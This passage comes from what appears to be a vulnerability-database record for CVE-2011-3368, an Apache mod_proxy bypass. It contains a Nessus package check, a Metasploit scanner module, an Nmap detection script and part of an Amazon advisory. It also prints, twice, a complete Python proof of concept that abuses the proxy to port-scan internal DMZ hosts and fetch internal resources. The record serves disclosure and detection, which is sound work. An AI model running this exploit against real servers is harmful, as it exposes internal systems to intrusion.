After installing\nthe updated packages, the httpd daemon must be restarted for the\nupdate to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-3368\"\n );\n # https://rhn.redhat.com/errata/RHSA-2011-1245.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2011:1245\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2011:1392\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-suexec\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2011:1392\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", reference:\"httpd-2.0.52-49.ent\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"httpd-devel-2.0.52-49.ent\")) 
flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"httpd-manual-2.0.52-49.ent\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"httpd-suexec-2.0.52-49.ent\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"mod_ssl-2.0.52-49.ent\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"httpd-2.2.3-53.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"httpd-2.2.3-53.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"httpd-2.2.3-53.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"httpd-devel-2.2.3-53.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"httpd-manual-2.2.3-53.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"httpd-manual-2.2.3-53.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"httpd-manual-2.2.3-53.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"mod_ssl-2.2.3-53.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"mod_ssl-2.2.3-53.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"mod_ssl-2.2.3-53.el5_7.3\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / httpd-suexec / mod_ssl\");\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "exploitdb": [{"lastseen": "2016-02-02T08:55:50", "description": "Apache mod_proxy Reverse Proxy Exposure Vulnerability PoC. CVE-2011-3368. 
Remote exploits for multiple platform", "published": "2011-10-11T00:00:00", "type": "exploitdb", "title": "Apache mod_proxy Reverse Proxy Exposure Vulnerability PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3368"], "modified": "2011-10-11T00:00:00", "id": "EDB-ID:17969", "href": "https://www.exploit-db.com/exploits/17969/", "sourceData": "#!/usr/bin/env python\r\n\r\nimport socket\r\nimport string\r\nimport getopt, sys\r\n\r\n\r\nknown_ports = [0,21,22,23,25,53,69,80,110,137,139,443,445,3306,3389,5432,5900,8080]\r\n\r\ndef send_request(url, apache_target, apache_port, internal_target, internal_port, resource):\r\n\r\n\tget = \"GET \" + url + \"@\" + internal_target + \":\" + internal_port + \"/\" + resource + \" HTTP/1.1\\r\\n\"\r\n\tget = get + \"Host: \" + apache_target + \"\\r\\n\\r\\n\"\r\n\t\r\n\tremoteserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\tremoteserver.settimeout(3)\r\n\r\n\ttry:\r\n\t\tremoteserver.connect((apache_target, int(apache_port)))\r\n\t\tremoteserver.send(get)\r\n\t\treturn remoteserver.recv(4096)\r\n\texcept:\r\n\t\treturn \"\"\r\n\r\ndef get_banner(result):\r\n\treturn result[string.find(result, \"\\r\\n\\r\\n\")+4:]\r\n\r\n\r\ndef scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource):\r\n\r\n\tprint_banner(url, apache_target, apache_port, internal_target, tested_ports, resource)\r\n\tfor port in tested_ports:\r\n\t\tport = str(port)\r\n\t\tresult = send_request(url, apache_target, apache_port, internal_target, port, resource)\r\n\t\tif string.find(result,\"HTTP/1.1 200\")!=-1 or \\\r\n\t\tstring.find(result,\"HTTP/1.1 30\")!=-1 or \\\r\n\t\tstring.find(result,\"HTTP/1.1 502\")!=-1:\r\n\t\t\tprint \"- Open port: \" + port + \"/TCP\"\r\n\t\t\tprint get_banner(result)\r\n\t\telif len(result)==0:\r\n\t \t\tprint \"- Filtered port: \" + port + \"/TCP\"\r\n\t\telse:\r\n\t \t\tprint \"- Closed port: \" + port + \"/TCP\"\r\n\t\t\t\r\n\r\ndef usage():\r\n\tprint\r\n\tprint \"CVE-2011-3368 
proof of concept by Rodrigo Marcos\"\r\n\tprint \"http://www.secforce.co.uk\"\r\n\tprint\r\n\tprint \"usage():\"\r\n\tprint \"python apache_scan.py [options]\"\r\n\tprint\r\n\tprint \" [options]\"\r\n\tprint \"\t\t-r: Remote Apache host\"\r\n\tprint \"\t\t-p: Remote Apache port (default is 80)\"\r\n\tprint \"\t\t-u: URL on the remote web server (default is /)\"\r\n\tprint \"\t\t-d: Host in the DMZ (default is 127.0.0.1)\"\r\n\tprint \"\t\t-e: Port in the DMZ (enables 'single port scan')\"\r\n\tprint \"\t\t-g: GET request to the host in the DMZ (default is /)\"\r\n\tprint \"\t\t-h: Help page\"\r\n\tprint\r\n\tprint \"examples:\"\r\n\tprint \" - Port scan of the remote host\"\r\n\tprint \"\t\tpython apache_scan.py -r www.example.com -u /images/test.gif\"\r\n\tprint \" - Port scan of a host in the DMZ\"\r\n\tprint \"\t\tpython apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local\"\r\n\tprint \" - Retrieve a resource from a host in the DMZ\"\r\n\tprint \"\t\tpython apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local -e 80 -g /accounts/index.html\"\r\n\tprint\r\n\r\ndef print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource):\r\n\tprint\r\n\tprint \"CVE-2011-3368 proof of concept by Rodrigo Marcos\"\r\n\tprint \"http://www.secforce.co.uk\"\r\n\tprint\r\n\tprint \" [+] Target: \" + apache_target\r\n\tprint \" [+] Target port: \" + apache_port\r\n\tprint \" [+] Internal host: \" + internal_target\r\n\tprint \" [+] Tested ports: \" + str(tested_ports)\r\n\tprint \" [+] Internal resource: \" + resource\r\n\tprint\r\n\r\n\r\ndef main():\r\n\r\n\tglobal apache_target\r\n\tglobal apache_port\r\n\tglobal url\r\n\tglobal internal_target\r\n\tglobal internal_port\r\n\tglobal resource\r\n\r\n\ttry:\r\n\t\topts, args = getopt.getopt(sys.argv[1:], \"u:r:p:d:e:g:h\", [\"help\"])\r\n\texcept getopt.GetoptError:\r\n\t\tusage()\r\n\t\tsys.exit(2)\r\n\r\n\ttry:\r\n\t\tfor o, a in opts:\r\n\t\t\tif o in (\"-h\", 
\"--help\"):\r\n\t\t\t\tusage()\r\n\t\t\t\tsys.exit(2)\r\n\t\t\tif o == \"-u\":\r\n\t\t\t\turl=a\r\n\t\t\tif o == \"-r\":\r\n\t\t\t\tapache_target=a\r\n\t\t\tif o == \"-p\":\r\n\t\t\t\tapache_port=a\r\n\t\t\tif o == \"-d\":\r\n\t\t\t\tinternal_target = a\r\n\t\t\tif o == \"-e\":\r\n\t\t\t\tinternal_port=a\r\n\t\t\tif o == \"-g\":\r\n\t\t\t\tresource=a\t\t\t\t\r\n\t\t\r\n\texcept getopt.GetoptError:\r\n\t\tusage()\r\n\t\tsys.exit(2)\r\n\t\t\r\n\tif apache_target == \"\":\r\n\t\tusage()\r\n\t\tsys.exit(2)\r\n\r\n\r\nurl = \"/\"\r\napache_target = \"\"\r\napache_port = \"80\"\r\ninternal_target = \"127.0.0.1\"\r\ninternal_port = \"\"\r\nresource = \"/\"\r\n\r\nmain()\r\n\r\nif internal_port!=\"\":\r\n\ttested_ports = [internal_port]\r\nelse:\r\n\ttested_ports = known_ports\r\n\r\nscan_host(url, apache_target, apache_port, internal_target, tested_ports, resource)\r\n\r\n\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/17969/"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:03", "description": "\nApache mod_proxy - Reverse Proxy Exposure", "edition": 1, "published": "2011-10-11T00:00:00", "title": "Apache mod_proxy - Reverse Proxy Exposure", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3368"], "modified": "2011-10-11T00:00:00", "id": "EXPLOITPACK:460143F0ACAE117DD79BD75EDFDA154B", "href": "", "sourceData": "#!/usr/bin/env python\n\nimport socket\nimport string\nimport getopt, sys\n\n\nknown_ports = [0,21,22,23,25,53,69,80,110,137,139,443,445,3306,3389,5432,5900,8080]\n\ndef send_request(url, apache_target, apache_port, internal_target, internal_port, resource):\n\n\tget = \"GET \" + url + \"@\" + internal_target + \":\" + internal_port + \"/\" + resource + \" HTTP/1.1\\r\\n\"\n\tget = get + \"Host: \" + apache_target + \"\\r\\n\\r\\n\"\n\t\n\tremoteserver = socket.socket(socket.AF_INET, 
socket.SOCK_STREAM)\n\tremoteserver.settimeout(3)\n\n\ttry:\n\t\tremoteserver.connect((apache_target, int(apache_port)))\n\t\tremoteserver.send(get)\n\t\treturn remoteserver.recv(4096)\n\texcept:\n\t\treturn \"\"\n\ndef get_banner(result):\n\treturn result[string.find(result, \"\\r\\n\\r\\n\")+4:]\n\n\ndef scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource):\n\n\tprint_banner(url, apache_target, apache_port, internal_target, tested_ports, resource)\n\tfor port in tested_ports:\n\t\tport = str(port)\n\t\tresult = send_request(url, apache_target, apache_port, internal_target, port, resource)\n\t\tif string.find(result,\"HTTP/1.1 200\")!=-1 or \\\n\t\tstring.find(result,\"HTTP/1.1 30\")!=-1 or \\\n\t\tstring.find(result,\"HTTP/1.1 502\")!=-1:\n\t\t\tprint \"- Open port: \" + port + \"/TCP\"\n\t\t\tprint get_banner(result)\n\t\telif len(result)==0:\n\t \t\tprint \"- Filtered port: \" + port + \"/TCP\"\n\t\telse:\n\t \t\tprint \"- Closed port: \" + port + \"/TCP\"\n\t\t\t\n\ndef usage():\n\tprint\n\tprint \"CVE-2011-3368 proof of concept by Rodrigo Marcos\"\n\tprint \"http://www.secforce.co.uk\"\n\tprint\n\tprint \"usage():\"\n\tprint \"python apache_scan.py [options]\"\n\tprint\n\tprint \" [options]\"\n\tprint \"\t\t-r: Remote Apache host\"\n\tprint \"\t\t-p: Remote Apache port (default is 80)\"\n\tprint \"\t\t-u: URL on the remote web server (default is /)\"\n\tprint \"\t\t-d: Host in the DMZ (default is 127.0.0.1)\"\n\tprint \"\t\t-e: Port in the DMZ (enables 'single port scan')\"\n\tprint \"\t\t-g: GET request to the host in the DMZ (default is /)\"\n\tprint \"\t\t-h: Help page\"\n\tprint\n\tprint \"examples:\"\n\tprint \" - Port scan of the remote host\"\n\tprint \"\t\tpython apache_scan.py -r www.example.com -u /images/test.gif\"\n\tprint \" - Port scan of a host in the DMZ\"\n\tprint \"\t\tpython apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local\"\n\tprint \" - Retrieve a resource from a host in the 
DMZ\"\n\tprint \"\t\tpython apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local -e 80 -g /accounts/index.html\"\n\tprint\n\ndef print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource):\n\tprint\n\tprint \"CVE-2011-3368 proof of concept by Rodrigo Marcos\"\n\tprint \"http://www.secforce.co.uk\"\n\tprint\n\tprint \" [+] Target: \" + apache_target\n\tprint \" [+] Target port: \" + apache_port\n\tprint \" [+] Internal host: \" + internal_target\n\tprint \" [+] Tested ports: \" + str(tested_ports)\n\tprint \" [+] Internal resource: \" + resource\n\tprint\n\n\ndef main():\n\n\tglobal apache_target\n\tglobal apache_port\n\tglobal url\n\tglobal internal_target\n\tglobal internal_port\n\tglobal resource\n\n\ttry:\n\t\topts, args = getopt.getopt(sys.argv[1:], \"u:r:p:d:e:g:h\", [\"help\"])\n\texcept getopt.GetoptError:\n\t\tusage()\n\t\tsys.exit(2)\n\n\ttry:\n\t\tfor o, a in opts:\n\t\t\tif o in (\"-h\", \"--help\"):\n\t\t\t\tusage()\n\t\t\t\tsys.exit(2)\n\t\t\tif o == \"-u\":\n\t\t\t\turl=a\n\t\t\tif o == \"-r\":\n\t\t\t\tapache_target=a\n\t\t\tif o == \"-p\":\n\t\t\t\tapache_port=a\n\t\t\tif o == \"-d\":\n\t\t\t\tinternal_target = a\n\t\t\tif o == \"-e\":\n\t\t\t\tinternal_port=a\n\t\t\tif o == \"-g\":\n\t\t\t\tresource=a\t\t\t\t\n\t\t\n\texcept getopt.GetoptError:\n\t\tusage()\n\t\tsys.exit(2)\n\t\t\n\tif apache_target == \"\":\n\t\tusage()\n\t\tsys.exit(2)\n\n\nurl = \"/\"\napache_target = \"\"\napache_port = \"80\"\ninternal_target = \"127.0.0.1\"\ninternal_port = \"\"\nresource = \"/\"\n\nmain()\n\nif internal_port!=\"\":\n\ttested_ports = [internal_port]\nelse:\n\ttested_ports = known_ports\n\nscan_host(url, apache_target, apache_port, internal_target, tested_ports, resource)", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "metasploit": [{"lastseen": "2020-03-11T23:10:37", "description": "Scan for poorly configured reverse proxy servers. 
By default, this module attempts to force the server to make a request with an invalid domain name. Then, if the bypass is successful, the server will look it up and of course fail, then responding with a status code 502. A baseline status code is always established and if that baseline matches your test status code, the injection attempt does not occur. \"set VERBOSE true\" if you are paranoid and want to catch potential false negatives. Works best against Apache and mod_rewrite\n", "published": "2011-10-10T22:34:50", "type": "metasploit", "title": "Apache Reverse Proxy Bypass Vulnerability Scanner", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3368"], "modified": "2017-07-24T13:26:21", "id": "MSF:AUXILIARY/SCANNER/HTTP/REWRITE_PROXY_BYPASS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'Apache Reverse Proxy Bypass Vulnerability Scanner',\n 'Description' => %q{\n Scan for poorly configured reverse proxy servers.\n By default, this module attempts to force the server to make\n a request with an invalid domain name. Then, if the bypass\n is successful, the server will look it up and of course fail,\n then responding with a status code 502. A baseline status code\n is always established and if that baseline matches your test\n status code, the injection attempt does not occur.\n \"set VERBOSE true\" if you are paranoid and want to catch potential\n false negatives. 
Works best against Apache and mod_rewrite\n },\n 'Author' => ['chao-mu'],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['URL', 'http://www.contextis.com/research/blog/reverseproxybypass/'],\n ['CVE', '2011-3368'],\n ]\n )\n\n register_options(\n [\n OptString.new('ESCAPE_SEQUENCE',\n [true, 'Character(s) that terminate the rewrite rule', '@']),\n\n OptString.new('INJECTED_URI',\n [true, 'String injected after escape sequence', '...']),\n\n OptInt.new('EXPECTED_RESPONSE',\n [true, 'Status code that indicates vulnerability', 502]),\n\n OptString.new('BASELINE_URI',\n [true, 'Requested to establish that EXPECTED_RESPONSE is not the usual response', '/']),\n ])\n end\n\n def make_request(host, uri, timeout=20)\n begin\n requested_at = Time.now.utc\n response = send_request_raw({'uri' => uri}, timeout)\n responded_at = Time.now.utc\n rescue ::Rex::ConnectionError => e\n vprint_error e.to_s\n return nil\n end\n\n if response.nil?\n vprint_error \"#{rhost}:#{rport} Request timed out\"\n return nil\n end\n\n seconds_transpired = (responded_at - requested_at).to_f\n vprint_status \"#{rhost}:#{rport} Server took #{seconds_transpired} seconds to respond to URI #{uri}\"\n\n status_code = response.code\n vprint_status \"#{rhost}:#{rport} Server responded with status code #{status_code} to URI #{uri}\"\n\n return {\n :requested_at => requested_at,\n :responded_at => responded_at,\n :status_code => status_code\n }\n end\n\n def run_host(host)\n test_status_code = datastore['EXPECTED_RESPONSE']\n\n baseline = make_request(host, datastore['BASELINE_URI'])\n if baseline.nil?\n return\n end\n\n if baseline[:status_code] == test_status_code\n vprint_error \"#{rhost}:#{rport} The baseline status code for #{host} matches our test's\"\n return\n end\n\n uri = datastore['ESCAPE_SEQUENCE'] + datastore['INJECTED_URI']\n injection_info = make_request(host, uri, 60)\n\n status_code = injection_info[:status_code]\n if status_code == test_status_code\n print_good \"#{rhost}:#{rport} 
Server appears to be vulnerable!\"\n report_vuln(\n :host => host,\n :port => rport,\n :proto => 'tcp',\n :sname => ssl ? 'https' : 'http',\n :name => self.name,\n :info => \"Module #{self.fullname} obtained #{status_code} when requesting #{uri}\",\n :refs => self.references,\n :exploited_at => injection_info[:requested_at]\n )\n end\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb"}], "nmap": [{"lastseen": "2019-05-30T17:04:43", "description": "Tests for the CVE-2011-3368 (Reverse Proxy Bypass) vulnerability in Apache HTTP server's reverse proxy mode. The script will run 3 tests: \n\n * the loopback test, with 3 payloads to handle different rewrite rules \n * the internal hosts test. According to Contextis, we expect a delay before a server error. \n * The external website test. This does not mean that you can reach a LAN ip, but this is a relevant issue anyway. \n\nReferences: \n\n * http://www.contextis.com/research/blog/reverseproxybypass/\n\n## Script Arguments \n\n#### http-vuln-cve2011-3368.prefix \n\nsets the path prefix (directory) to check for the vulnerability.\n\n#### slaxml.debug \n\nSee the documentation for the slaxml library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the http library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. 
\n\n## Example Usage \n \n \n nmap --script http-vuln-cve2011-3368 <targets>\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 80/tcp open http\n | http-vuln-cve2011-3368:\n | VULNERABLE:\n | Apache mod_proxy Reverse Proxy Security Bypass\n | State: VULNERABLE\n | IDs: CVE:CVE-2011-3368 BID:49957\n | Description:\n | An exposure was reported affecting the use of Apache HTTP Server in\n | reverse proxy mode. The exposure could inadvertently expose internal\n | servers to remote users who send carefully crafted requests.\n | Disclosure date: 2011-10-05\n | Extra information:\n | Proxy allows requests to external websites\n | References:\n | https://www.securityfocus.com/bid/49957\n |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3368\n \n\n## Requires \n\n * http\n * os\n * shortport\n * stdnse\n * string\n * vulns\n * rand\n\n* * *\n", "edition": 11, "published": "2011-11-17T19:33:19", "title": "http-vuln-cve2011-3368 NSE Script", "type": "nmap", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3368"], "modified": "2019-04-02T16:51:36", "id": "NMAP:HTTP-VULN-CVE2011-3368.NSE", "href": "https://nmap.org/nsedoc/scripts/http-vuln-cve2011-3368.html", "sourceData": "local http = require \"http\"\nlocal os = require \"os\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal vulns = require \"vulns\"\nlocal rand = require \"rand\"\n\ndescription = [[\nTests for the CVE-2011-3368 (Reverse Proxy Bypass) vulnerability in Apache HTTP server's reverse proxy mode.\nThe script will run 3 tests:\n* the loopback test, with 3 payloads to handle different rewrite rules\n* the internal hosts test. According to Contextis, we expect a delay before a server error.\n* The external website test. 
This does not mean that you can reach a LAN ip, but this is a relevant issue anyway.\n\nReferences:\n* http://www.contextis.com/research/blog/reverseproxybypass/\n]]\n\n---\n-- @usage\n-- nmap --script http-vuln-cve2011-3368 <targets>\n--\n-- @output\n-- PORT STATE SERVICE\n-- 80/tcp open http\n-- | http-vuln-cve2011-3368:\n-- | VULNERABLE:\n-- | Apache mod_proxy Reverse Proxy Security Bypass\n-- | State: VULNERABLE\n-- | IDs: CVE:CVE-2011-3368 BID:49957\n-- | Description:\n-- | An exposure was reported affecting the use of Apache HTTP Server in\n-- | reverse proxy mode. The exposure could inadvertently expose internal\n-- | servers to remote users who send carefully crafted requests.\n-- | Disclosure date: 2011-10-05\n-- | Extra information:\n-- | Proxy allows requests to external websites\n-- | References:\n-- | https://www.securityfocus.com/bid/49957\n-- |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3368\n--\n-- @args http-vuln-cve2011-3368.prefix sets the path prefix (directory) to check for the vulnerability.\n--\n\nauthor = {\"Ange Gutek\", \"Patrik Karlsson\"}\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"intrusive\", \"vuln\"}\n\n\n\nportrule = shortport.http\n\naction = function(host, port)\n\n local vuln = {\n title = 'Apache mod_proxy Reverse Proxy Security Bypass',\n IDS = { CVE='CVE-2011-3368', BID='49957'},\n description = [[\nAn exposure was reported affecting the use of Apache HTTP Server in\nreverse proxy mode. 
The exposure could inadvertently expose internal\nservers to remote users who send carefully crafted requests.]],\n references = { 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3368' },\n dates = {\n disclosure = { year='2011', month='10', day='05'}\n },\n }\n\n local report = vulns.Report:new(SCRIPT_NAME, host, port)\n local prefix = stdnse.get_script_args(\"http-vuln-cve2011-3368.prefix\") or \"\"\n\n -- Take a reference chrono for a 404\n local start = os.time(os.date('*t'))\n local random_page = rand.random_alpha(20)\n local reference = http.get(host,port,(\"%s/%s.htm\"):format(prefix,random_page))\n local chrono_404 = os.time(os.date('*t'))-start\n\n -- TEST 1: the loopback test, with 3 payloads to handle different rewrite rules\n local all\n all = http.pipeline_add((\"%s@localhost\"):format(prefix),nil, all)\n all = http.pipeline_add((\"%s:@localhost\"):format(prefix),nil, all)\n all = http.pipeline_add((\"%s:@localhost:80\"):format(prefix), nil, all)\n\n local bypass_request = http.pipeline_go(host,port, all)\n if ( not(bypass_request) ) then\n stdnse.debug1(\"got no answers from pipelined queries\")\n return stdnse.format_output(false, \"Got no answers from pipelined queries\")\n end\n\n\n -- going through the results of TEST 1 we could see\n -- * 200 OK\n -- o This could be the result of the server being vulnerable\n -- o This could also be the result of a generic error page\n -- * 40X Error\n -- o This is most likely the result of the server NOT being vulnerable\n --\n -- We can not determine whether the server is vulnerable or not solely\n -- by relying on the 200 OK. 
If we have no 200 OK abort, otherwise continue\n local got_200_ok\n for _, response in ipairs(bypass_request) do\n if ( response.status == 200 ) then\n got_200_ok = true\n end\n end\n\n -- if we didn't get at least one 200 OK, the server is most like NOT vulnerable\n if ( not(got_200_ok) ) then\n vuln.state = vulns.STATE.NOT_VULN\n return report:make_output(vuln)\n end\n\n for i=1, #bypass_request, 1 do\n stdnse.debug1(\"test %d returned a %d\",i,bypass_request[i].status)\n\n -- here a 400 should be the evidence for a patched server.\n if ( bypass_request[i].status == 200 and vuln.state ~= vulns.STATE.VULN ) then\n\n -- TEST 2: the internal hosts test. According to Contextis, we expect a delay before a server error.\n -- According to my (Patrik) tests, internal hosts reachable by the server may return instant responses\n local tests = {\n { prefix = \"\", suffix = \"\" },\n { prefix = \":\", suffix = \"\"},\n { prefix = \":\", suffix = \":80\"}\n }\n\n -- try a bunch of hosts, and hope we hit one that's\n -- not on the network, this will give us the delay we're expecting\n local hosts = {\n \"10.10.10.10\",\n \"192.168.211.211\",\n \"172.16.16.16\"\n }\n\n -- perform one request for each host, and stop once we\n -- receive a timeout for one of them\n for _, h in ipairs(hosts) do\n local response = http.get(\n host,\n port,\n (\"%s%s@%s%s\"):format(prefix, tests[i].prefix, h, tests[i].suffix),\n { timeout = ( chrono_404 + 5 ) * 1000 }\n )\n -- check if the GET timed out\n if ( not(response.status) ) then\n vuln.state = vulns.STATE.VULN\n break\n end\n end\n end\n end\n\n -- TEST 3: The external website test. 
This does not mean that you can reach a LAN ip, but this is a relevant issue anyway.\n local external = http.get(host,port, (\"%s@scanme.nmap.org\"):format(prefix))\n if ( external.status == 200 and string.match(external.body,\"Go ahead and ScanMe\") ) then\n vuln.extra_info = \"Proxy allows requests to external websites\"\n end\n return report:make_output(vuln)\nend\n\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "amazon": [{"lastseen": "2020-11-10T12:35:45", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3368", "CVE-2011-3348"], "description": "**Issue Overview:**\n\nIt was discovered that the Apache HTTP Server did not properly validate the request URI for proxied requests. In certain configurations, if a reverse proxy used the ProxyPassMatch directive, or if it used the RewriteRule directive with the proxy flag, a remote attacker could make the proxy connect to an arbitrary server, possibly disclosing sensitive information from internal web servers not directly accessible to the attacker. ([CVE-2011-3368](<https://access.redhat.com/security/cve/CVE-2011-3368>))\n\nIt was discovered that mod_proxy_ajp incorrectly returned an \"Internal Server Error\" response when processing certain malformed HTTP requests, which caused the back-end server to be marked as failed in configurations where mod_proxy was used in load balancer mode. A remote attacker could cause mod_proxy to not send requests to back-end AJP (Apache JServ Protocol) servers for the retry timeout period or until all back-end servers were marked as failed. 
